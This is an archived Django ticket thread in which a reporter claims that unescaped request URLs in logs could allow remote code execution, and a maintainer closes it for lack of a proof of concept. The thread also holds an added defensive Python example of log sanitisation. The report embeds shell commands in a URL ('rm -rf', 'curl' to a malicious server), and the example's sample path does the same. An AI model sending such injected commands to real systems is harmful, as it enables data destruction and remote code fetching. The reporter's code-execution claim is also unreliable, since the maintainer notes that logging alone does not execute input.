[Django] #33610: Django does not escape the request url in default logging mechanism and may be vulnerable to remote code execution


Django

unread,
Mar 31, 2022, 12:46:32 AM3/31/22
to django-...@googlegroups.com
#33610: Django does not escape the request url in default logging mechanism and may
be vulnerable to remote code execution
-----------------------------------------+------------------------
Reporter: Dhananjay1992 | Owner: nobody
Type: Bug | Status: new
Component: Utilities | Version: 4.0
Severity: Normal | Keywords:
Triage Stage: Unreviewed | Has patch: 0
Needs documentation: 0 | Needs tests: 0
Patch needs improvement: 0 | Easy pickings: 0
UI/UX: 0 |
-----------------------------------------+------------------------
**Issue**:

When logging is enabled in Django, the log_response method in log.py of the
django.utils package logs the given url in the log file as it is, without
escaping the url, which may lead to remote code execution.

**For example:**
An attacker hits the Django project with this url: <hostname>/cgi-bin;cd
/var/temp;rm -rf <any folder>; curl <malicious remote server url>

In this case we can see the log file entry with a warning (yes, because of
the 404 not found error, the level is warning) with the given url as it is.
IMHO we should escape the request/response logging so as to minimise the
remote code execution possibilities.

--
Ticket URL: <https://code.djangoproject.com/ticket/33610>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
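Added here as an illustration, not code from the ticket or from Django: a stdlib-only stand-in for the request logger's "Not Found" warning, showing what escaping a logged path does and does not change. The path is plain text to the logging machinery; the only characters that can alter a text log's structure are CR/LF and other control characters, and the hypothetical SanitizeArgsFilter escapes exactly those while leaving shell metacharacters as inert text (SAMPLE_PATH is a constructed input).

```python
import io
import logging
import re

# Constructed sample: shell metacharacters like the ticket's example, plus a
# CR/LF pair, which is what can actually forge a second line in a text log.
SAMPLE_PATH = "/cgi-bin;cd /tmp;curl http://example.invalid/\r\nWARNING forged entry"

# Control characters (NUL..US and DEL) can change the structure of a log file;
# shell metacharacters such as ';' are ordinary text there and are left alone.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_for_log(value: str) -> str:
    """Render each control character as a visible \\xNN escape."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)


class SanitizeArgsFilter(logging.Filter):
    """Hypothetical filter (not part of Django): escapes the string arguments
    of a record before the handler formats it, so a request path can never
    add a line to the log."""

    def filter(self, record: logging.LogRecord) -> bool:
        if isinstance(record.args, tuple):
            record.args = tuple(
                sanitize_for_log(a) if isinstance(a, str) else a for a in record.args
            )
        return True


def render_not_found(path: str, sanitize: bool) -> str:
    """Log 'Not Found: <path>' the way the request logger's 404 warning does,
    through a stdlib logger, and return the formatted log output."""
    logger = logging.getLogger("demo.request.sanitized" if sanitize else "demo.request.raw")
    logger.propagate = False
    logger.setLevel(logging.WARNING)
    logger.handlers.clear()
    logger.filters.clear()
    buf = io.StringIO()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    if sanitize:
        logger.addFilter(SanitizeArgsFilter())
    logger.warning("Not Found: %s", path)
    return buf.getvalue()


if __name__ == "__main__":
    print(render_not_found(SAMPLE_PATH, sanitize=False))  # two lines; the forged one looks genuine
    print(render_not_found(SAMPLE_PATH, sanitize=True))   # one line; CR/LF shown as \x0d\x0a
```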

Django

unread,
Mar 31, 2022, 4:44:15 AM3/31/22
to django-...@googlegroups.com
#33610: Django does not escape the request url in default logging mechanism and may
be vulnerable to remote code execution
---------------------------+--------------------------------------
Reporter: DJD | Owner: nobody
Type: Bug | Status: closed
Component: Utilities | Version: 4.0
Severity: Normal | Resolution: needsinfo
Keywords: | Triage Stage: Unreviewed
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
---------------------------+--------------------------------------
Changes (by Carlton Gibson):

* status: new => closed
* resolution: => needsinfo


Comment:

Please don't report security issues here! Contact
secu...@djangoproject.com instead.

It's not clear how logging leads to a code execution but please send a
full proof of concept to secu...@djangoproject.com and we can review.
Thanks.

--
Ticket URL: <https://code.djangoproject.com/ticket/33610#comment:1>
